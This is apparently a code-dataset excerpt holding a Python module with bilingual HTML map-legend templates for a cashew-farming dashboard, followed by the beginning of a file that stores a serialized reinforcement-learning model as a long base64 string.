hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
8387ea3e14246f9daa7aa84c61d4b9e503a87db6
| 5,702
|
py
|
Python
|
apps/dashboard/map_legend.py
|
TechnoServe/Caju-Dashboard-v2
|
7345cbfc677f60665276437dbe0a68a992b03b17
|
[
"MIT"
] | null | null | null |
apps/dashboard/map_legend.py
|
TechnoServe/Caju-Dashboard-v2
|
7345cbfc677f60665276437dbe0a68a992b03b17
|
[
"MIT"
] | null | null | null |
apps/dashboard/map_legend.py
|
TechnoServe/Caju-Dashboard-v2
|
7345cbfc677f60665276437dbe0a68a992b03b17
|
[
"MIT"
] | null | null | null |
from branca.element import Template, MacroElement
template_fr = """
{% macro html(this, kwargs) %}
<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="//code.jquery.com/ui/1.12.1/themes/base/jquery-ui.css">
<script src="https://code.jquery.com/jquery-1.12.4.js"></script>
<script src="https://code.jquery.com/ui/1.12.1/jquery-ui.js"></script>
<script>
$( function() {
$( "#maplegend" ).draggable({
start: function (event, ui) {
$(this).css({
right: "auto",
top: "auto",
bottom: "auto"
});
}
});
});
</script>
</head>
<body>
<div id='maplegend' class='maplegend'
style='position: absolute; z-index:9999; border:2px solid grey; background-color:rgba(255, 255, 255, 0.8);
border-radius:6px; padding: 10px; font-size:14px; right: 20px; bottom: 20px;'>
<div class='legend-title'>Legende</div>
<div class='legend-scale'>
<ul class='legend-labels'>
<li><img src="https://cdn.mapmarker.io/api/v1/font-awesome/v5/pin?icon=fa-warehouse&size=25&hoffset=0&voffset=-1
&background=1167b1"> Entrepot de cajoux</li>
<li><img src="https://cdn.mapmarker.io/api/v1/font-awesome/v5/pin?icon=fa-globe-africa&size=25&hoffset=0&voffset
=-1&background=008000"> Plantation</li>
<li><img src="https://cdn.mapmarker.io/api/v1/font-awesome/v5/pin?icon=fa-leaf&size=25&hoffset=0&voffset=-1
&background=c63e2b"> Pépinière</li>
<li><img src="https://cdn.mapmarker.io/api/v1/font-awesome/v5/pin?icon=fa-warehouse&size=25&hoffset=0&voffset=-1
&background=DBA800"> Lieu d'Apprentissage</li>
<li> <img src="https://i.ibb.co/J3L37CV/Picture3.png" width="17" height="24"> Prédictions
satellitaire</li>
</ul>
</div>
</div>
</body>
</html>
<style type='text/css'>
.maplegend .legend-title {
text-align: left;
margin-bottom: 5px;
font-weight: bold;
font-size: 90%;
}
.maplegend .legend-scale ul {
margin: 0 0 5px;
padding: 0;
float: left;
list-style: none;
}
.maplegend .legend-scale ul li {
font-size: 80%;
list-style: none;
margin-left: 0;
line-height: 18px;
margin-bottom: 2px;
}
.maplegend ul.legend-labels li span {
display: block;
float: left;
height: 16px;
width: 30px;
margin-right: 5px;
margin-left: 0;
border: 1px solid #999;
}
.maplegend .legend-source {
font-size: 80%;
color: #777;
clear: both;
}
.maplegend a {
color: #777;
}
</style>
{% endmacro %}"""
template_en = """
{% macro html(this, kwargs) %}
<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="//code.jquery.com/ui/1.12.1/themes/base/jquery-ui.css">
<script src="https://code.jquery.com/jquery-1.12.4.js"></script>
<script src="https://code.jquery.com/ui/1.12.1/jquery-ui.js"></script>
<script>
$( function() {
$( "#maplegend" ).draggable({
start: function (event, ui) {
$(this).css({
right: "auto",
top: "auto",
bottom: "auto"
});
}
});
});
</script>
</head>
<body>
<div id='maplegend' class='maplegend'
style='position: absolute; z-index:9999; border:2px solid grey; background-color:rgba(255, 255, 255, 0.8);
border-radius:6px; padding: 10px; font-size:14px; right: 20px; bottom: 20px;'>
<div class='legend-title'>Legend</div>
<div class='legend-scale'>
<ul class='legend-labels'>
<li><img src="https://cdn.mapmarker.io/api/v1/font-awesome/v5/pin?icon=fa-warehouse&size=25&hoffset=0&voffset=-1
&background=1167b1"> Cashew Warehouse</li>
<li><img src="https://cdn.mapmarker.io/api/v1/font-awesome/v5/pin?icon=fa-globe-africa&size=25&hoffset=0&voffset
=-1&background=008000"> Plantation Location</li>
<li><img src="https://cdn.mapmarker.io/api/v1/font-awesome/v5/pin?icon=fa-leaf&size=25&hoffset=0&voffset=-1
&background=c63e2b"> Nursery</li>
<li><img src="https://cdn.mapmarker.io/api/v1/font-awesome/v5/pin?icon=fa-warehouse&size=25&hoffset=0&voffset=-1
&background=DBA800"> Training Location</li>
<li> <img src="https://i.ibb.co/J3L37CV/Picture3.png" width="17" height="24"> Satellite
predictions</li>
</ul>
</div>
</div>
</body>
</html>
<style type='text/css'>
.maplegend .legend-title {
text-align: left;
margin-bottom: 5px;
font-weight: bold;
font-size: 90%;
}
.maplegend .legend-scale ul {
margin: 0 0 5px;
padding: 0;
float: left;
list-style: none;
}
.maplegend .legend-scale ul li {
font-size: 80%;
list-style: none;
margin-left: 0;
line-height: 18px;
margin-bottom: 2px;
}
.maplegend ul.legend-labels li span {
display: block;
float: left;
height: 16px;
width: 30px;
margin-right: 5px;
margin-left: 0;
border: 1px solid #999;
}
.maplegend .legend-source {
font-size: 80%;
color: #777;
clear: both;
}
.maplegend a {
color: #777;
}
</style>
{% endmacro %}"""
macro_fr = MacroElement()
macro_fr._template = Template(template_fr)
macro_en = MacroElement()
macro_en._template = Template(template_en)
| 28.79798
| 116
| 0.601543
| 769
| 5,702
| 4.447334
| 0.210663
| 0.032749
| 0.032164
| 0.030409
| 0.908772
| 0.908772
| 0.908772
| 0.908772
| 0.908772
| 0.908772
| 0
| 0.052995
| 0.212382
| 5,702
| 197
| 117
| 28.944162
| 0.708528
| 0
| 0
| 0.8
| 0
| 0.114286
| 0.958962
| 0.140652
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.005714
| 0
| 0.005714
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
83e1d3700dc2d3281b808c2622bdc3d762c3f696
| 357,594
|
py
|
Python
|
rl_agents/a3c_agent_v1_deterministic.py
|
IsaiahPressman/Kaggle_Santa_2020
|
ff5c6aa78dbe234cef338f4c721cc30d7dbc3df8
|
[
"MIT"
] | null | null | null |
rl_agents/a3c_agent_v1_deterministic.py
|
IsaiahPressman/Kaggle_Santa_2020
|
ff5c6aa78dbe234cef338f4c721cc30d7dbc3df8
|
[
"MIT"
] | null | null | null |
rl_agents/a3c_agent_v1_deterministic.py
|
IsaiahPressman/Kaggle_Santa_2020
|
ff5c6aa78dbe234cef338f4c721cc30d7dbc3df8
|
[
"MIT"
] | null | null | null |
serialized_string = b'gAN9cQBYEAAAAG1vZGVsX3N0YXRlX2RpY3RxAWNjb2xsZWN0aW9ucwpPcmRlcmVkRGljdApxAilScQMoWBoAAABiYXNlLjAubWVzc2FnZV9wYXNzaW5nX21hdHEEY3RvcmNoLl91dGlscwpfcmVidWlsZF90ZW5zb3JfdjIKcQUoY3RvcmNoLnN0b3JhZ2UKX2xvYWRfZnJvbV9ieXRlcwpxBkI8nQAAgAKKCmz8nEb5IGqoUBkugAJN6QMugAJ9cQAoWBAAAABwcm90b2NvbF92ZXJzaW9ucQFN6QNYDQAAAGxpdHRsZV9lbmRpYW5xAohYCgAAAHR5cGVfc2l6ZXNxA31xBChYBQAAAHNob3J0cQVLAlgDAAAAaW50cQZLBFgEAAAAbG9uZ3EHSwR1dS6AAihYBwAAAHN0b3JhZ2VxAGN0b3JjaApGbG9hdFN0b3JhZ2UKcQFYDgAAADk0NTAzNjM5ODI4NDgwcQJYAwAAAGNwdXEDTRAnTnRxBFEugAJdcQBYDgAAADk0NTAzNjM5ODI4NDgwcQFhLhAnAAAAAAAAAAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1f